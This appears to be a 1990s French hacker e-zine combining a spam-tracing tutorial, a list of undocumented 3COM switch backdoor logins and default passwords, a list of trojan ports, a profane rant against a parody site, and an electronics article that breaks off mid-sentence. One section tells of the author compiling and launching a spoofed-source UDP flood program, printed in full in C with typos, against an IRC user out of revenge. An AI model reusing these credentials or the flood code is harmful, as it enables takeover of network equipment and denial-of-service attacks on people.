souvent assimilé à quelque chose d'omniprésent (dans tous les magasins alimentaires), de
dénué de goût, insipide, ou sans substance. Les Monty-Pythons l'on rendu encore plus
populaire grace a l'un de leur sketch. D'autres, disent que SPAM vient de la contraction de
" Send by Post A lot of Mail " sans commentaire ... Mais quelle imagination !!! (N'est ce
pas Archangel t'as du fumer la moquette pour trouver ca !!!)

Un spam est un message envoyé a plusieurs destinataires en même temps, soit personnellement
à une adresse email, soit dans un groupe de news. Ces messages ont toujours un rapport avec
soit la religion (sectes), l'argent (comment gagner 10$ a la seconde) ou le sexe. Ces
derniers temps, les spammers ont pris une très grande importance, avec en plus une loi
Francaise qui leur est favorable, ce qui peut entrainer une surcharge des serveurs mail, de
serveurs de news, de la bande passante, et des temps de connexion.

Combien parmi vous, pour un mail intéressant, ne se sont pas retrouvés avec 10 mails en même
temps vous vantant les mérites du produits DUCHMOL, ou bien comment gagner beaucoup d'argent
dans une très brève période de temps ???
La cible privilégiée des SPAMMERS sont les comptes email du genre geocities.com ou USA.net
etc etc ...
A cela 2 raisons: Les emails "tants gratuites, tous le monde prends une " boite " de ce
genre au cas ou, ou bien pour rester " faussement " anonyme. Il ne reste plus qu'au spammer
à récupérer ces adresses trouvées dans les groupes de news, mailing list, site Web, pour se
créer une banque de données d'adresses email.

En ce qui concerne Geocites.com ou USA.net, ces boites étant gratuites, et ayant un très
gros trafic par jour, l'administration de ces boites est parfois totalement négligée, pas
de filtrages anti spam, ce qui n'est pas le cas chez la pluspart des fournisseurs d'accès
internet. Un exemple concret, l'arrêt provisoire mais total des serveurs Mail de USA.NET il
y a maintenant 6 mois suite a l'utilisation de ces serveurs de mail comme relais pour des
email de type publicitaires.

Comment lutter contre les spammers???
C'est un peut comme jouer au chat et a la sourie. Premièrement, ne JAMAIS répondre à un
spammer. Souvent, le message vous est envoyé sans que l'expéditeur ne connaisse réellement
votre adresse email, et le fait de lui répondre, lui permet de " valider " votre adresse
email. Certains messages du genre " Si vous ne désirez plus recevoir ces informations,
renvoyez ce message avec la mention " unsubscribe ", peuvent etre un moyen détourner de
connaitre votre adresse email (NDRL : Les salauds !! Les salauds !!).

D'une manière générale, se méfier de tout message dont vous ne connaissez pas l'expéditeur.
Ne jamais donner son adresse email réelle sans que cela ne soit réellement nécessaire. Dans
les groupes de News, indiquer une adresse du genre:

" jean_duchmol@NOSPAMgeocities.com " suivis du message " Remove NOSPAM to respond ".

LES MOYENS TECHNIQUES POUR RETROUVER UN EMAIL SPAMMER:
(Le mail ci-dessous est pris totalement a titre d'exemple, les commandes utilisées sont des
commandes sous Unix ou Linux, mais peuvent tout a fait etre adaptées sous Windows.
[ Pour ceux qui l'utilise encore ;-)) ]. Supposons que vous ayez reçu l'email ci-dessous,
nous affichons a l'écran le mail en affichant aussi le " Header " ou " entete " du mail.
(Pour ceux qui sont par exemple sous un lecteur de mail type Netscape, pour les autres, les
pures et durs, la question ne se pause meme pas. ).

----------------------------------------------------------------
Received: from mail.gnn.com (70.los-angeles-3.ca.dial-access.att.net [165.238.38.70]) by
mail-e2b-service.gnn.com (8.7.1/8.6.9) with SMTP id BAA14636; Sat, 17 Aug 1996 01:55:06
-0400 (EDT)

Date: Sat, 17 Aug 1996 01:55:06 -0400 (EDT)
Message-Id: <199608170555.BAA14636@mail-e2b-service.gnn.com>
To:
Subject: FREE HEAVEN.
From: FREE@Heaven.com

" FREE " House and lot in " HEAVEN "
Reserve yours now, do it today, do not wait. It is FREE
just for the asking. You receive a Personalized Deed and detailed Map to
your home in HEAVEN. Send your name and address along with a one time
minimum donation of $1.98 cash, check, or money order to help cover s/h cost

TO: Saint Peter's Estates
P.O. Box 9864
Bakersfield,CA 93389-9864

This is a gated community and it is " FREE ".
Total satisfaction for 2 thousand years to date.
>From the Gate Keeper. (PS. See you at the Pearly Gates)
GOD will Bless you.
----------------------------------------------------------------

Nous pouvons nous douter a coup sur que l'en-tête de ce mail est faux. Le but du Spammer
est de vous atteindre a coup sur, mais de se protéger de son coté de vos réponses ou
insultes.

Nous utilisons, donc la commande " whois "

illegal# whois heaven.com

nous avons la réponse:

Time Warner Cable Broadband Applications (HEAVEN-DOM)
2210 W. Olive Avenue
Burbank, CA 91506

Domain Name: HEAVEN.COM
Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
Melo, Michael (MM428) michael@HEAVEN.COM
(818) 295-6671

Record last updated on 02-Apr-96.
Record created on 17-Jun-93.

Domain servers in listed order:
CHEX.HEAVEN.COM 206.17.180.2
NOC.CERF.NET 192.153.156.22

----------------------------------------------------------------
suite a cela nous allons vérifier l'adresse d'expédition:

illegal# finger FREE@heaven.com

nous avons la réponse suivante:
[heaven.com]
finger: heaven.com: Connection timed out

Plusieurs possibilitées suite a cette réponse: soit l'administrateur du système de
heaven.com a désactivé le port " finger ", soit heaven.com n'est pas actif. Nous allons
tester cette hypothese avec la commande " ping ".

illegal# ping heaven.com

la réponse est:
heaven is alive
Cela veux dire que heaven.com est bien " actif " a ce moment donné.
Nous testons cela par:

illegal# telnet heaven.com

nous devrions arriver a un écran nous demandant un " login " et un " password ", a la place
de cela nous avons par exemple:

Trying 198.182.200.1 ...
telnet: connect: Connection timed out

Maintenant, nous savons que les gens ne peuvent pas se connecter a distance a heaven.com.
Donc, nous pouvons en déduire que le spam n'a surement pas été envoyé de cette endroit.
Vérifions maintenant, chex.heaven.com est ce de là que le Spam a été envoyé? essayons:

illegal# telnet chex.heaven.com 79

(79 port finger) Nous avons la réponse:

Trying 201.202.203.204 ...
telnet: connect: Connection timed out

donc, ni heaven.com ni chex.heaven.com n'ont pu etre utilisé par des personnes pour envoyer
du mail. Donc ce sont 2 liens faux dans le " header " du mail.

Essayons maintenant:

illegal# whois gnn.com

la réponse est:

America Online (GNN2-DOM)
8619 Westwood Center Drive
Vienna, VA 22182
USA

Domain Name: GNN.COM
Administrative Contact:
Colella, Richard (RC1504) colella@AOL.NET
703-453-4427
Technical Contact, Zone Contact:
Runge, Michael (MR1268) runge@AOL.NET
703-453-4420
Billing Contact:
Lyons, Marty (ML45) marty@AOL.COM
703-453-4411

Record last updated on 07-May-96.
Record created on 22-Jun-93.

Domain servers in listed order:
DNS-01.GNN.COM 204.148.98.241
DNS-AOL.ANS.NET 198.83.210.28

Bingo, gnn.com est hébergé par America Online. AOL est un réseau informatique possédant des
passerelles vers l'Internet. Revenons donc a notre " entete " de mail spam.

illegal# whois att.net

La réponse est:

AT&T EasyLink Services (ATT2-DOM)
400 Interpace Pkwy
Room B3C25
Parsippany, NJ 07054-1113
US

Domain Name: ATT.NET
Administrative Contact, Technical Contact, Zone Contact:
DNS Technical Support (DTS-ORG) hostmaster@ATTMAIL.COM
314-519-5708
Billing Contact:
Gardner, Pat (PG756) pegardner@ATTMAIL.COM
201-331-4453

Record last updated on 27-Jun-96.
Record created on 13-Dec-93.

Domain servers in listed order:
ORCU.OR.BR.NP.ELS-GMS.ATT.NET199.191.129.139
WYCU.WY.BR.NP.ELS-GMS.ATT.NET199.191.128.43
OHCU.OH.MT.NP.ELS-GMS.ATT.NET199.191.144.75
MACU.MA.MT.NP.ELS-GMS.ATT.NET199.191.145.136

Bingo, encore un domain valide. Le coupable a donc pu envoyer son spam soit de heaven.com
soit de gnn.com soit de att.net. Nous savons qu'il a peu de chance que cela soit de
" heaven.com " puisque nous n'avons même pas eu de réponse du port login. Mais il reste
encore: att.net et gnn.com qui sont fortement suspects.

La dernière étape est donc, d'envoyer une copie du spam reçu avec sont header à la fois a
postmaster@gnn.com et a runge@AOL.NET qui est listé par whois comme contact technique, ainsi
que: postmaster@att.net ou bien hostmaster@ATTMAIL.COM (le contact technique).

Avec un peux de chance, une de ces personne en lisant son courrier pourra utiliser le
" ID number " du spam pour retrouver qui a falsifié ce mail et la plupart du temps, résilier
le compte internet du coupable. Restez toujours poli avec ces personnes, elles sont là pour
administrer le réseau et sont de votre coté. (la plupart du temps ;-)) Ne vous amusez pas à
retrouver vous même le Spamer pour le bombarder d'insultes, cela n'avance a rien, (NDRL : Si
ça soulage comme dirait un certain Ingénieur conseil que je connais ;) et vous devenez vous
meme le spamer. Si vous vous trompez de destinataire, lui ne vous ratera pas, et peux vous
" pourrir " la vie.

Personnellement, il y a plusieurs années, suite a une petite dispute, disons plutôt
divergence de point de vue, je me suis retrouvé avec 40 mails par jours concernant la
culture isoponique des laitues. Depuis, je suis incollable sur le sujet ;-))) Très
intéressant d'ailleurs. !!! Non sans dec !!! Ma seule parade a été de moi même remonter le
responsable de ce mail a la source, et de faire pareil. Ce n'est pas une solution croyez moi
... Respectez les autres et l'on vous respectera. Passez toujours par le responsable ou
l'administrateur réseau, il est comme vous, il n'aime pas du tout héberger des gens
pratiquant le spamming.

PROCHAIN ARTICLE:
La culture de la betterave sucrière sur les haut plateaux Tibétains.
(Article qui sera réalisé par Bill Gates, suite a une reconversion forcée de son équipe et
de lui même.)


__________________\|/__________________
----===ILLEGAL===----
/|\
"If Hacking is illegal, knowledge is illegal."
ICQ N. 7812204
ill3gal@(NOSPAM)geocities.com

http://www.geocities.com/SiliconValley/Lakes/6154/


------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------



IV]Les failles made in 3COM


Systèmes affectés :

Les systèmes tournant sur les switches 3COM (CoreBuilder LAN et SuperStack II)

Je tiens tout d'abord à remercier Eric Monti à qui nous devons la découverte de cette faille
dans le système de sécurité des switches 3COM...



Cette backdoor est en fait un niveau d'accès non documenté par nos amis de chez 3com ;)
Sans doute ont ils oubliés de l'inclure dans leurs docs par inadvertance, aussi j'aurai la
bonté de le faire à leur place et gratuitement...

Cette backdoor affecte les versions dites "intelligentes" et "étendues" des progs de
switching pour les switches Lanplex/Corebuilder.

En effet, en plus des classique account "admin", "read", et "write", il y a un autre
account:

LOGIN : debug
PASS : synnet

Cet account à certaines particularités :

Il possède non seulement tous les privilèges du compte 'admin', mais également quelques
commandes de debugging qui ne sont disponibles sous aucun autre compte.

En effet, avec un simple 'telnet', en vous loggant en 'debug', vous pouvez changer tous
les autres mots de passe, y compris celui du compte 'admin', sans pour autant posséder,
l'ancien !!!

Cela vous permet donc d'avoir un contrôle absolument complet sur le switche!
Vous pouvez même en bloquer l'accès à son propriétaire... (qui à dit que les réseaux
switchés étaient les plus sécurisés ?).

Cette technique a été vérifiée sur :

Lanplex/CoreBuilder 2500s (SW versions 7.x et 8.x)
CoreBuilder 3500 (Version 1.0.0.)
3Com LANplex 2500 (rev 7.15) avec la version 7.0.1-19.

Il existe une backdoor similaire qui marche sur LinkSwitch 2700 et CELLplex 7000 :

LOGIN : tech
PASS : tech

Bon un petit résumé :

CoreBuilder 6000/2500
-username: debug password: synnet

CoreBuilder 7000
-username: tech password; tech

SuperStack II Switch 2200
-username: debug password: synnet

SuperStack II switch 2700
-username: tech password: tech

Pendant qu'on y est, sachez également que vous pouvez trouver sur les SuperStack II switch
1000 (et 3000), l'account 'monitor', password 'monitor'. Pour tout vous dire sachez qu' à
l'usine sont mis en place les account suivant :

'monitor', 'manager', et 'security' : Le pass étant le nom du compte (manager;manager).

Et il arrive fréquemment que les administeurs oublient de changer les 3...

BONUS : 3com Netbuilders

vous voulez récupérer les clefs SNMP et les password admin ? pas de prob ;)

enterprises.synernetics.lanplex.lanplexSystemsMib.1.19.0 = "password"
enterprises.synernetics.lanplex.lanplexSystemsMib.6.7.0 = "public"


#Brain Override#


--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------

V]Liste des ports par défaut utilisés par les trojans.


Et bien je dirai en commentaire que ca peut toujours servir.


port 21 - Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Kuang2, ProMail trojan, Shtrilitz,
Stealth, Tapiras, Terminator, WinPC, WinSpy
port 31 - Agent 31, Hackers Paradise, Masters Paradise
port 41 - DeepThroat
port 58 - DMSetup
port 79 - Firehotcker
port 80 - Executor
port 110 - ProMail trojan
port 121 - JammerKillah
port 421 - TCP Wrappers
port 456 - Hackers Paradise
port 531 - Rasmin
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Attack FTP, Satanz Backdoor
port 911 - Dark Shadow
port 999 - DeepThroat
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1012 - Doly Trojan
port 1024 - NetSpy
port 1045 - Rasmin
port 1090 - Xtreme
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1243 - BackDoor-G, SubSeven
port 1245 - VooDoo Doll
port 1349 (UDP) - BO DLL
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2565 - Striker
port 2583 - WinCrash
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4567 - File Nail
port 4590 - ICQTrojan
port 5000 - Bubbel, Back Door Setup, Sockets de Troie
port 5001 - Back Door Setup, Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5555 - ServeMe
port 5556 - BO Facil
port 5557 - BO Facil
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6400 - The Thing
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6776 - BackDoor-G, SubSeven
port 6939 - Indoctrination
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - Back Door Setup, ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 10520 - Acid Shivers
port 10607 - Coma
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack´99 KeyLogger
port 12345 - GabanBus, NetBus, Pie Bill Gates, X-bill
port 12346 - GabanBus, NetBus, X-bill
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 12631 - WhackJob
port 13000 - Senna Spy
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 (UDP) - Delta Source
port 29891 (UDP) - The Unexplained
port 30029 - AOL Trojan
port 30100 - NetSphere
port 30101 - NetSphere
port 30102 - NetSphere
port 30303 - Sockets de Troie
port 31337 - Baron Night, BO client, BO2, Bo Facil
port 31337 (UDP) - BackFire, Back Orifice, DeepBO
port 31338 - NetSpy DK
port 31338 (UDP) - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Agent 40421, Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 (UDP) - Delta Source
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 54321 - School Bus
port 60000 - Deep Throat
port 61466 - Telecommando
port 65000 - Devil



#Brain.Override#

--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------

VI] Liste de quelques sites interessants.

Et oui, une simple liste.. N'empêche que ce ne sont pas forcemment les plus connus les
meilleurs. Alors bon surf ;)

http://www.sendmail.org
http://www.cypango.net/~spam/
http://www.tis.com
http://www.cert.org
http://iris.acs.neu.edu/~goedicke/security.html
http://www.wolfenet.com/~jhardin/ipwadm.html
http://www.users.interport.net/~reptile/linux/index.html
http://www.ecst.csuchico.edu/~jtmurphy/
http://www.erols.com/avenger/
http://www.rootshell.com/
http://www.dna.lth.se/~erics/linux.html
http://www.sophist.demon.co.uk/ping/index.html
http://www.cs.iastate.edu/~ghelmer/unixsecurity/unix_vuln.html
http://www.geek-girl.com/bugtraq/
http://www.greatcircle.com/pkt_filtering.html
http://www.tiac.net/users/steveg/security.html



--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------


VII] Conseal Pc firewall...

Il est 2H00 du mat, les yeux éclatés vous essayer de comprendre ce que vous avez codé vous
même pendant 3 jours sans dormir... Vous n'en pouvez plus, vous décidez de vous détendre
un moment avec vos potes sur IRC. Connection établie.. Je me tape la causette avec mon
pote Snowcrash. Soudain, une fenêtre s'ouvre:

<ARCHANGEL> Et mec, je suis ARCHANGEL le meilleur des hackers !! Je te défie en COMBAT
singulier, Je suis un R3AL H4ck3R moi !

Je ferme la fenêtre et je continue ma causette..

Quelques secondes plus tard :

<ARCHANGEL> t'as pas compris ou quoi ? Tu t'écrases, t'es qu'une merde !! FUCK OFF !!
T'façons j'ai mis mes protection je suis invincible avec mon super firewall.. Même que j'
ai fais sauter la protection de la limitation dans le temps. T'es mort mon gars !!!

<Brain-Ove> C'est bien t'as trouvé le crack de conseal sur Astalavista, maintenant écrase,
Je cause et je te trouve nuisible ok ? Vas sur #L4m3rZ et fais pas chier.

<ARCHANGEL> Eh ?? T'as essayé de pirater mon ordi ?? Je vais te winnuker t'es mort, dans
quelques secondes tu es déconnecté..

Dommage pour lui, mais sur mon firewall linux, le port 139 n'est pas ouvert...

Bon il est temps de régler son compte à ce blaireau..
Je lance ce programme génial qu'est TuneEmul et je lance une session telnet sur un de mes
serveurs linux. Ensuite je compile ce petit programme.

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet.ip.h>
#include <netinet/udp.h>
#include

  
<errno.h>
#include <strings.h>
#include <netdb.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef BROKEN_LIBC
#include <arpa/inet.h>
#else
#define u_char unsigned char
#define u_short unsigned short
#endif

strict sockaddr sa;

int main(int argc,char **argv)
{
int fd;
int x=1;
int hosti=192;
int hostii=168;
int hostiii=1;
int meep=0;
int fooport=1;
int numpack=0;
char funhost[15];
struct sockaddr_in *p;
struct hostent *he;
u_char gram[36]=
{
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xff, 0x11, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,

0, 0, 0, 0,
0x00, 0x12, 0x00, 0x00,

'3','1','3','3','7','8','9','0'
};

if(argc!=3)
{
fprintf(stderr,"Saihyousen, by Noc-Waggge\n");
fprintf(stderr,"The faster your connection to the internet is (latency
wise, not bandwith)\n"
;
fprint(stderr,"and the lower the CPU speed of the victim
will\nincrease probability of success\n"
;
fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen
127.0.0.1 40000\n"
,*argv);
exit(1);
};
if((fd=socket (AF_INET,SOCK_RAW,IPPROTO_RAW))==-1)
{
perror("requires RAW SOCKETS");
exit(1);
};

#ifdef IP_HDRINCL
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL");
exit(1);
};
#else
fprintf(stderrn,"we don't have IP_HDRINCL :-(\n\n");
#endif

/* The stuff below is so that it's not fully sequencial i.e
100.100.100.101, 100.100.100.102 */

for (numpack=0;numpack<=atoi(argv[2];numpack++) {
if (meep=0) { ++hosti; meep++;}
if (hosti>254) hosti=1;
if (meep==1) { ++hostii; meep++;}
if (hostii>254) hostii=1;
if (meep==2) { ++hostiii; meep=0;}
if (hostiii>254) hostiii=1;

sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
(he=gethostbyname(funhost));
bcopy(*(he->h_addr_list),(gram+12),4);

if((he=gethostbyname(argv[1]))==NULL)
{
fprintf(stderr,"can't resolve destination hostname\n");
exit(1);
};
bcopy(*(he->h_addr_list),(gram+16),4);
fooport++;
/* resets the port to 1 if it's nearing the end of possible values */
if (fooport>65530) (fooport=1;);
*(u_short*)(gram+20)=htons((u_short)fooport);
*(u_short*)(gram+22)=htons((u_short)fooport);

p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),siezof(struct in_addr));

if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct
sockaddr)))== -1)
{
perror("sendto");
exit(1);
};
/*printf("Packet # %i\n", numpack); */
/* Turn that on to see where you are.. it'll slow the attack though */
};
printf("Attack against %s finished", argv[1]);
putchar('\n');
return 1;
}

N'oublions pas de remercier Max Schau qui est l'auteur de cet exploit. Petit message avant
le lancement du programme :
<Brain-Ove> C'est l'heure d'aller se coucher pour les lamers..
<ARCHANGEL> HEIN ??
<Brain-Ove> La chance accorde ses faveurs aux esprits avertis.



#Brain.Override#

------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------
VIII] ZIPIZ

Vous avez surement vu récemment le dernier site qui tord le cou à l'underground ! :
zipiz.com.

Bon bref résumé : ce site est en gros une parodie du site zataz.com, où tout ce qui touche
à l'underground est tourné à la dérision.

Bon avouons quelque chose, du point de vu technique, le site a été extrèmement bien
réalisé : c'est du travail d'artiste. Mais quand au contenu...

Exemple : Morceaux choisis :

"Ce mois-ci, un de mes préférés : Brain Override, 23 ans. Activités principales :
auteur-compositeur au bontempi à pédale, science-fiction, magie noire et courses chez
Auchan Aubagne. Bref, le prototype du Jean-Kevin. Mon modèle. Il publie l'un des zines
underground les plus débiles disponibles sur le marché : "
le Cyber Hacker's Guide".
Un seul numéro pour l'instant !"


Primo : je n'ai jamais caché mon age.. (ni mon nom d'ailleurs...)

Secundo : Il me serait difficile d'aller faire mes courses à Aubagne, vu que j'habite aux
caraïbes et je ne m'en cache pas à Saint Barths. Cependant il se trouve que je rentre en
France, alors promis zipiz j'habiterai pas trop loin de Auchan Aubagne, comme çà tu auras
moins l'air d'un blaireau.

Tertio : Je ne suis pas auteur-compositeur, mais auteur interprète.

Quattro : il est vrai que j'aime assez la science-fiction mais quand à la magie noire,
heu... oui mais dans les jeux de rôles...

Pour finir, je ne suis pas boutonneux et les seules lunettes que je porte sont des
lunettes de soleil.

Bon çà c'était un peu le coup de gueule perso mais attaquons nous au reste...

Voyons un peu le niveau de ce monsieur qui a l'air de si bien nous connaître :

"C’est sûr que comme les hackers n’ont strictement aucune information intéressante à
partager avec qui que ce soit, ils ont tout à gagner dans ce partage. Néanmoins, le
piratage de la NASA n’ayant d’autres intérêts que de dénicher les horaires de la navette
spatiale et le pirate ayant peu de chance de se retrouver un jour en position de postuler
à un emploi d’hôtesse de l’espace, on se demande à quoi pourrait bien lui servir cette
information. Mais bon : Free ze information..."


Bon déjà on peut voir le quotient intellectuel du gars... Ok cela ne vole pas haut, mais
regardons de plus près :
En fait cet individu cherche à tourner à la dérision l'underground car il ne dispose en
fait d'aucun argument réel à nous opposer.. Alors la seule chose qu'il sait faire c'est
rire. Je cite :

"Il publie l'un des zines underground les plus débiles disponibles sur
le marché : "
le Cyber Hacker's Guide".

Notre sous-homme préféré l'a t'il seulement lu ? Où sont les critiques constructives ?

Bon le même :

"
Mais foin de subtilités linguistiques. Pour simplifier, sur ce site, le hacker, le
cracker, le pirate et le trou du cul désigne la même personne : un casse-couilles qui
bave de contentement à l'idée d'entrer dans des endroits où personne ne l'a invité.
Point."

Tout d'abord sachez que des gens comme Stallman se considèrent eux-même comme des hackers.
Un tel manque de respect est totalement injustifiable, de la part de quelqu'un qui
pourtant se sert d'un ordinateur, et surtout... d'internet. Car sans ces gens qu'il
appelle des casse-couilles ou des trous du cul, il ne pourrait avoir un site internet...
Mais bon chez ce genre de débile,on ne cherche pas trop à comprendre.

A noter égalemement que ce monsieur écrivait dans son site que j'étais parano en citant
non pas moi mais michel arboi qui avait un problème avec ses clefs PGP. Vous voyez donc
le genre.. Débile et mythomane.

Allez encore une :

"
j'ai quand même du mal à comprendre en quoi un quarteron de retardés boutonneux postant
des pages constellées de têtes de mort en flamme sur multimania peut être porteur d'un
idéal communautaire."

Vu la fixation de ce personnage sur les boutons, il a du avoir une adolescence
difficile... Peut être des problèmes plus intimes... Mais bon, après tout les problèmes
sexuels ou hormonaux de ce monsieurne nous regarde absolument pas. Heureusement pour lui
le viagra et les poupées gonflables devraient arranger cà !!!

"
Toutes les utopies n'ayant pu trouver à s'expérimenter ou ayant échoué dans le monde réel
cherchent à couvrir le net de qualités topologiques ou sociales (le village planétaire)
qu'il n'a pas et essaient de le remplir d'une population virtuelle qui n'existe pas. Un
cyber trou du cul est encore et d'abord un vrai trou du cul. C'est vrai qu'il est plus
simple de taguer 3 pages en HTML que de réinvestir l'île de la tortue pour y festoyer et
plus si affinités. Mais bon c'est quand même pas le même trip"

Sans commentaires...

"
Le métier de "profiler" de pirates est d'une telle facilité qu'il ferait passer un emploi
fictif de la mairie de Paris pour une corvée de chiotte dans un régiment de
diarrhéiques.."

De pire en pire...

"
L'arme nécessaire et suffisante pour la chasse aux pirates ça n'est pas le calibre 12
mais DejaNews. Ce site permet de faire des recherches dans tous les newsgroups de la terre
et de sa périphérie. Tapez le pseudo débile du hacker à identifier et vous connaîtrez en
3 secondes sa vie intime : ses préoccupations, ses angoisses, sa marque de céréales
préférée et, les bons jours, son numéro de sécurité sociale. Dans le pire des cas,
relancez la recherche sur ses centres d'intérêts spécifiques (Goldorak, les blondes au
gros seins, les centrales nucléaires peintes en bleu etc...) et vous découvrirez ses
autres pseudonymes et finalement, au détour d'un post anodin sur fr.misc.handicap
apparaîtra : jean-kevin.leboulet@groslamer.com"

Pour l'instant la seule chose que j'ai pu constater c'est que ce cher zipiz ne sait pas
s'en servir (il faut vraiment être con !) voir : erreur michel arboi.. Bref ce gars ne
sait même pas se servir de Deja-New : LA TACHE PAR EXCELLENCE !! Ne pas savoir lire une
entête,et en plus publier le résultat sur le web, il faut être con !!

"
Ils se croient indétectables en passant par 12 anonymizers à travers la planète mais ils
écrivent leurs petites annonces, racontent leur déboire sentimental (le pluriel est
superflu), répondent à la plus petite provocation en déballant les moindres détails de
leur pauvre vie sans aspérité : "j'ai passé trois mois en emploi d'jeun au Mac D... du
boulevard Mac D.. du 8 au 12 février 1999, donc je sais de quoi je parle !"
. "je cherche
un appartement près de mon boulot à..."
, "ma copine est coréenne et son chien moldave",
"je vends ma télé, mon micro-onde, un canapé-lit et une red hat pas déballée", "je cherche
du boulot en Corée"
(bon débarras), "j'ai vu le même portable au Auchan à Aubagne", "qui
connaît un médicament efficace contre l'acné juvénile"
, "cherche un fiancé pour mon
hamster Pépette, pas sérieux s'abstenir"
etc..."

Pour commencer, quelqu'un qui a des compétences de hacker, ne travaille pas dans un
"
mac do" et n'est pas en emploi jeune !! Pour ce qui est du portable à auchan aubagne
(vu que cette phrase est de moi), je resignale à ce monsieur que je vis aux Caraïbes
(mais évidemment j'ai des amis en métropole...) Zipiz a peut être fait ce site pour
réussir à dénicher quelqu'un de plus con que lui... Qu'il se rassure, il est bien le seul
à être aussi bête.

"
Limite, ça peut devenir amusant pour celui que ça amuse. A la fin de ce voyage au bout de
la bêtise, vous en reviendrez avec l'éternelle constatation : "Mais comment peut-on être
aussi con ?"


Sacré zipiz tu en sais quelque chose !!!
Voir :

Notre bonhomme fait sur son site la pub d'une boite qui teste la sécurité de votre PC..
Allez y si vous voulez vous marrez. Même pas spoofé, et sous Windaube, ces champions de la
sécurité informatique ne renvoient même pas la bonne IP et répondent attention faible
vulnérabilité car le port telnet est ouvert... On peut voir que les gens que recommande
zipiz sont à la hauteur de son quotient intellectuel.

Pour clore cet article, je dirai qu'il est dommage de voir ainsi du talent gaché, mais à
ce niveau là je pense que c'est irrécupérable : Les boeufs resteront des boeufs !!!


#Brain.Override#

------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------
IX] Un décodeur de tonalité



Un décodeur de tonalité est un système capable de reconnaître une fréquence et de donner
un ordre lors de la réception de cette fréquence. Le modèle que je vais vous proposer est
un modèle triple,capable de reconnaître trois fréquences différentes. Personnellement,
je m'en sert avec un téléphone mais rien ne vous empèche de l'utiliser avec un
magnétophone ou autre chose... Disons que si vous êtes vraiment parano et que vous voulez
déclencher à distance la destruction de votre ordinateur (bien que vous puissiez vous en
servir pour tout autre chose), ce montage pourra vous être utile.

Le schéma étant identique pour les trois fréquences, il vous suffit de le reproduire 3
fois. Le circuit utilisé est un LM, XR, NE567. Bien que vous puissiez le remplacer avec
quelque chose de beaucoup plus récent, ce montage est parfaitement fonctionnel et efficace
pour un coup dérisoire. Si vous souhaitez vous pouvez utiliser une version à faible
consommation comme le XRL567 mais vous aurez alors l'inconvénient d'un courant de sortie
plus faible... A vous de voir.

Le circuit intégré étant spécifique, il s'utilise en général en suivant les
recommandations du fabricant. L'astuce suivante ne se trouve pas dans les notes
d'applications ; elle consiste à relier 2 condensateurs à la broche 2, ce qui rend le
verrouillage du détecteur indépendant des fluctuations de tension provoquées par la
consommation du relais lorsque le montage fonctionne sur piles. La fréquence est
déterminée par le réseau P1, R1 C5 : F0 = 1/R x C5, R étant la somme P1+R1. Le signal
d'entrée est ajusté par P1. Le montage est plus sélectif avec une basse tension d'entrée
(environ 30 mV). La tension d'alimentation des relais peut être séparée de celle du
décodeur, on peut utiliser des relais 12V et installer, entre cette alimentation et la
ligne allant aux bornes 4 de CI 1, un régulateur 5V. Lorsque le décodeur reçoit un signal
à la fréquence d'accord de l'oscillateur du CI(sur la borne 5 on a un signal carré à la
fréquence d'accord), la sortie passe à 0.

Vous pouvez en fait réunir le nombre de filtres que vous souhaitez et vous règlerez chacun
d'eux à une fréquence différente. Vous choisirez les fréquences à l'intérieur d'une octave,
car le circuit est sensible aux harmoniques. Les condensateur sont au tantale, ce qui
permet d'avoir des dimensions réduites. Personnellement je personnalise chaque montage en
